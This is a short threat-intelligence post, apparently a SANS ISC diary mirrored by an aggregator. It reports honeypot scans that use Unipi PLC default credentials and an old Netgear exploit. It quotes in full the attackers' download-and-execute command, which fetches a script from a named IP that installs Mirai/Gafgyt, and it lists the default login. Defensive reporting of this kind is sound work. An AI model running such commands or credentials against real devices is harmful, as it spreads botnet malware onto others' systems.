Unipi Technologies开发用于家庭自动化、楼宇管理和工业控制的可编程逻辑控制器模块,基于定制Linux平台Marvis。近期发现攻击者利用默认凭据及Netgear旧漏洞尝试入侵其设备,并部署Mirai恶意软件。 2025-5-12 13:49:21 Author: isc.sans.edu(查看原文) 阅读量:15 收藏
Unipi Technologies is a company developing programmable logic controllers for a number of different applications like home automation, building management, and industrial controls. The modules produced by Unipi are likely to appeal to a more professional audience. All modules are based on the "Marvis" platform, a customized Linux distribution maintained by Unipi.
In the last couple of days, we did observe scans for the unipi default username and password ("unipi" and "unipi.technology") in our honeypot logs. The scans originate from 176.65.148.10, an IP address that is well-known to our database.
In addition to SSH, the IP address also scans for an ancient Netgear vulnerability from 2013, which only got a CVE number last year (CVE-2024-12847).
Both, the SSH as well as the "Netgear" exploit attempts are executing the same commands:
cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh
which kicks off the standard Mirai/Gafgyt install chain.
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
如有侵权请联系:admin#unsafe.sh